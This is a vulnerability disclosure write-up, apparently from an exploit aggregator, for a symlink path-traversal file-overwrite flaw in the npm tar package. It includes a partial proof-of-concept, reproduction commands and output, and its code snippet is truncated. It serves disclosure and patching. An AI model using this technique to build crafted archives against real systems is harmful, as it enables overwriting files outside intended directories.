Share
## https://sploitus.com/exploit?id=3E88350D-5E20-5699-A994-CE5ED19ACE9B
# CVE-2026-31802: tar Symlink Path Traversal / Arbitrary File Overwrite

**Research:** [Joshua van Rijswijk](https://github.com/Jvr2022)

## Description

This repository contains my proof of concept and write-up for **CVE-2026-31802**, a high-severity vulnerability in the npm `tar` package (`node-tar`) affecting versions ` {
  fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})
```

## Reproduction

### Install a vulnerable version

```
npm install tar@7.5.10
```

### Run the PoC

```
node poc.cjs && readlink a/b/l && ls -l a/b/l ../target.txt
```

### Observed output

```
PWNED
../../../target.txt
lrwxrwxrwx ... a/b/l -> ../../../target.txt
-rw-r--r-- ... ../target.txt
```

`PWNED` confirms that the file outside the extraction directory was overwritten.

The `readlink` output and file listing show that the extracted symlink points outside the intended extraction root.

## Impact

This issue gives an attacker an **arbitrary file overwrite primitive outside the intended extraction directory**, with the permissions of the process performing extraction.

Realistic scenarios include:

* CLI tools extracting untrusted tarballs into a working directory
* build and update pipelines consuming third-party archives
* services that import user-supplied tar files
* developer tooling that automatically unpacks bundles or artifacts

In those environments, a crafted archive can cause writes to land outside the directory the application expects to control.

## Affected Versions

* Affected: `tar <= 7.5.10`
* Patched: `tar 7.5.11`

## Fix

This issue was patched in **`7.5.11`**.

Users should upgrade immediately:

```
npm install tar@^7.5.11
```

## References

* GitHub Advisory: GHSA-9ppj-qmqm-q256
* CVE: CVE-2026-31802